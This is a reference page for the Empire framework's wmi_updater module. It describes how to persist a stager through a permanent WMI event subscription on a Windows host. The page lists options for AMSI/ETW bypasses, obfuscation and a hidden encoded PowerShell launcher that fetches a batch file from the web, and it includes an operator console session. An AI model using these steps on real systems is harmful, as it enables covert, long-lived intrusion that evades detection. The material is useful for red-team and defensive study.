Invoke-WMI - Empire Module
This page contains detailed information about how to use the powershell/persistence/elevated/wmi_updater Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi_updater
Source code [1]: empire/server/modules/powershell/persistence/elevated/wmi_updater.yaml
Source code [2]: empire/server/modules/powershell/persistence/elevated/wmi_updater.py
MITRE ATT&CK:
T1084
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: No
The wmi_updater module persists a stager (or script) using a permanent WMI event subscription, which is stored in the WMI repository and therefore survives reboots. This has a difficult detection/removal rating.
This module runs in the foreground and is OPSEC unsafe: it writes to disk and can therefore be detected by AV/EDR running on the target system.
Note that, as the module metadata above states (Needs admin: Yes), the wmi_updater module requires administrative privileges to work properly; a normal, non-elevated user cannot create a permanent WMI subscription.
Required Module Options
This is a list of options that are required by the wmi_updater module:
Agent
Agent to run module on.
Launcher
Launcher string.
Default value: powershell -noP -sta -w 1 -enc
SubName
Name to use for the event subscription.
Default value: AutoUpdater
WebFile
The location of the launcher.bat file to fetch over the network/web.
Default value: http://127.0.0.1/launcher.bat
Additional Module Options
This is a list of additional options that are supported by the wmi_updater module:
AtStartup
Switch. Trigger the script within 5 minutes of system startup.
Default value: True
Bypasses
Bypasses as a space-separated list to be prepended to the launcher.
Default value: mattifestation etw
Cleanup
Switch. Clean up the trigger and any script from the specified location.
DailyTime
Daily time at which to trigger the script (HH:mm).
ExtFile
Use an external file for the payload instead of a stager.
Obfuscate
Switch. Obfuscate the launcher PowerShell code; uses ObfuscateCommand to select the obfuscation type. For PowerShell only.
Default value: False
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if the Obfuscate switch is True. For PowerShell only.
Default value: Token\All\1
Wmi_updater Example Usage
Here's an example of how to use the wmi_updater module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/wmi_updater
Author @mattifestation
@harmj0y
@tristandostaler
Background False
Comments https://github.com/mattifestation/PowerSploit/blob/master/Persistence/
Persistence.psm1
Description Persist a stager (or script) using a permanent WMI subscription. This
has a difficult detection/removal rating.
Language powershell
Name powershell/persistence/elevated/wmi_updater
NeedsAdmin True
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1084
,Record Options----,--------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------------------|----------|-------------------------------------|
| AtStartup | True | False | Switch. Trigger script (within 5 |
| | | | minutes) of system startup. |
|------------------|--------------------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------------------|----------|-------------------------------------|
| Cleanup | | False | Switch. Cleanup the trigger and any |
| | | | script from specified location. |
|------------------|--------------------------------|----------|-------------------------------------|
| DailyTime | | False | Daily time to trigger the script |
| | | | (HH:mm). |
|------------------|--------------------------------|----------|-------------------------------------|
| ExtFile | | False | Use an external file for the |
| | | | payload instead of a stager. |
|------------------|--------------------------------|----------|-------------------------------------|
| Launcher | powershell -noP -sta -w 1 -enc | True | Launcher string. |
|------------------|--------------------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------------------|----------|-------------------------------------|
| SubName | AutoUpdater | True | Name to use for the event |
| | | | subscription. |
|------------------|--------------------------------|----------|-------------------------------------|
| WebFile | http://127.0.0.1/launcher.bat | True | The location of the launcher.bat |
| | | | file to fetch over the network/web |
'------------------'--------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set Launcher powershell
[*] Set Launcher to powershell
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set SubName AutoUpdater
[*] Set SubName to AutoUpdater
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > set WebFile http://127.0.0.1/launcher.bat
[*] Set WebFile to http://127.0.0.1/launcher.bat
(Empire: usemodule/powershell/persistence/elevated/wmi_updater) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/wmi_updater.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/wmi_updater.py
- https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1
- http://127.0.0.1/launcher.bat
- http://attack.mitre.org/techniques/T1084
See Also
Check also the following modules related to this module:
- powershell/persistence/elevated/schtasks
- powershell/persistence/elevated/registry
- powershell/persistence/elevated/wmi
- powershell/persistence/elevated/rid_hijack
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.